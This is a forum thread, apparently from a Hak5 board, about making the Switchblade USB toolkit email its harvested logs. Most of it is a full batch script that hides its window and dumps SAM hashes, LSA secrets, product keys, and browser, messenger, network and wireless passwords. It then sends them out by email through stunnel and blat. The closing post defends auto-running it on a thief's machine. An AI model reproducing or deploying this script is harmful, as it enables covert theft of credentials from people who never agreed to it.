Jump to content

Switchblade and the ability to email log file it creates


Recommended Posts

Posted

When I run the SBConfig. exe there is a place to put Email address and passwords.    I would like it to email out to give basic information IP and username of system.  Basically email me the log file that is created  Is that built in or do I have to modify the Hackblade to do that for me.

This is a great tool.  Thank you in advance.

Posted

I did this the other day, go to http://forums.hak5.org/index.php/topic,6746.0.html and download the latest Pocket-Knife, install it on the USB stick as normal, go to WIPCMD. Save to code below as a batch script there (changeing the Gmail Password and Username). When you run it it emails the basic switchblade stuff to you email.

title Swicthblade Email
nircmd win hide title "Swicthblade Email"

@echo off
if not exist ....Documents md ....Documents >nul
if not exist ....Documentslogfiles md ....Documentslogfiles >nul
Echo ************************************ > ....Documentslogfiles%computername%.log 2>&1
echo ***********[System info]************ >> ....Documentslogfiles%computername%.log 2>&1
Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1
   echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> ....Documentslogfiles%computername%.log 2>&1
   ipconfig /all >> ....Documentslogfiles%computername%.log 2>&1
Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1
echo ***********[Dump SAM]*************** >> ....Documentslogfiles%computername%.log 2>&1
Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1
   .pwdump 127.0.0.1 >> ....Documentslogfiles%computername%.log 2>&1
Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1
echo ***********[Dump Product Keys]****** >> ....Documentslogfiles%computername%.log 2>&1
Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1
   .produkey /nosavereg /stext "....Documentslogfiles%computername%_pk.log" /remote %computername% >> ....Documentslogfiles%computername%.log 2>&1
   copy ....Documentslogfiles%computername%.log+....Documentslogfiles%computername%_pk.log* ....Documentslogfiles%computername%.log  >> nul
   del /f /q "....Documentslogfiles%computername%_pk.log" >nul
Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1
echo ***********[Dump LSA secrets]******* >> ....Documentslogfiles%computername%.log 2>&1
Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1
   .pspv.exe /stext "....Documentslogfiles%computername%_LSA.log" >> ....Documentslogfiles%computername%.log 2>&1
   copy ....Documentslogfiles%computername%.log+....Documentslogfiles%computername%_lsa.log* ....Documentslogfiles%computername%.log  >> nul
   del /f /q "....Documentslogfiles%computername%_lsa.log" >nul
Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1
echo ****[Dump LSA secrets Alternate]**** >> ....Documentslogfiles%computername%.log 2>&1
Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1
   .lsadump.exe >> "....Documentslogfiles%computername%_LSA.log" >> ....Documentslogfiles%computername%.log 2>&1
   copy ....Documentslogfiles%computername%.log+....Documentslogfiles%computername%_lsa.log* ....Documentslogfiles%computername%.log  >> nul
   del /f /q "....Documentslogfiles%computername%_lsa.log" >nul
Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1
echo ***********[Dump Network PW]******** >> ....Documentslogfiles%computername%.log 2>&1
Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1
   .netpass.exe /stext "....Documentslogfiles%computername%_np.log" >> ....Documentslogfiles%computername%.log 2>&1
   copy ....Documentslogfiles%computername%.log+....Documentslogfiles%computername%_np.log* ....Documentslogfiles%computername%.log  >> nul
   del /f /q "....Documentslogfiles%computername%_np.log" >nul
Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1
echo **********[Dump messenger PW]******* >> ....Documentslogfiles%computername%.log 2>&1
Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1
   .mspass.exe /stext "....Documentslogfiles%computername%_ms.log" >> ....Documentslogfiles%computername%.log 2>&1
   copy ....Documentslogfiles%computername%.log+....Documentslogfiles%computername%_ms.log* ....Documentslogfiles%computername%.log  >> nul
   del /f /q "....Documentslogfiles%computername%_ms.log" >nul
Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1
echo ****[Dump Internet Explorer PWDS]*** >> ....Documentslogfiles%computername%.log 2>&1
Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1
   .iepv.exe /stext "....Documentslogfiles%computername%_ie.log" >> ....Documentslogfiles%computername%.log 2>&1
   copy ....Documentslogfiles%computername%.log+....Documentslogfiles%computername%_ie.log* ....Documentslogfiles%computername%.log  >> nul
   del /f /q "....Documentslogfiles%computername%_ie.log" >nul
Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1
echo **********[Dump Wireless Key]******* >> ....Documentslogfiles%computername%.log 2>&1
Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1
   .wkv.exe /stext "....Documentslogfiles%computername%_wk.log" >> ....Documentslogfiles%computername%.log 2>&1
   copy ....Documentslogfiles%computername%.log+....Documentslogfiles%computername%_wk.log* ....Documentslogfiles%computername%.log  >> nul
   del /f /q "....Documentslogfiles%computername%_wk.log" >nul
Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1
echo ***********[Dump URL History]******* >> ....Documentslogfiles%computername%.log 2>&1
Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1
   cscript //nologo .DUH.vbs >> ....Documentslogfiles%computername%.log 2>&1
TYPE ....Documentslogfiles%computername%.log | find ":::" | find /V "NO PASSWORD" | find /V "ASPNET" | find /V "HelpAssistant" >> ....Documentslogfilespwfile.txt
set RtD=%CD%
cd /D "%appdata%MozillaFirefoxProfiles" >nul
set PROFILE=
for /D %%i in (*) do set PROFILE=%%i
cd /D %RtD% >nul
Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1
Echo *********[Dump Firefox PW]********** >> ....Documentslogfiles%computername%.log 2>&1
Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1
.FirePassword.exe "%appdata%MozillaFirefoxProfiles%PROFILE%" >> ....Documentslogfiles%computername%.log
move ....Documentslogfiles*.log ....Documentslogfiles%computername%
move ....Documentslogfiles*.txt ....Documentslogfiles%computername%

::gets to sbs
cd
cd wipsbs

:: Configure Email Options
SET emailfrom=GMAIL USERNAME
SET emailto=GMAIL USERNAME
SET password=GMAIL PASSWORD

::Starts Stunnel
stunnel-4.11.exe -install -quiet
net start stunnel

::Blat send computerdata.txt
blat.exe ....Documentslogfiles%computername%%computername%.log -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -server 127.0.0.1:1099 -subject Switchblade_%computername%

::Ends Stunnel and
net stop stunnel
stunnel-4.11.exe -uninstall -quiet

Exit

Ps. I know the codes crummy but it works so hey

Posted

Heh, interesting way of doing it...why not just let it create the standard log files (no need to edit go.bat), then make a second batch file (launched by start.bat) that emails those logs?

same result, no need to edit an existing component...you know what, I'll add the option to email all generated logs to the default pocket knife :smile:

Posted

Its because i have an encrypted part of my thumb drive with everything on apart from this and the tools neaded to do it, so if it gets stolen this will auto run and i can find out who has it, and if they dont want to give it back cause them alot of trouble.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...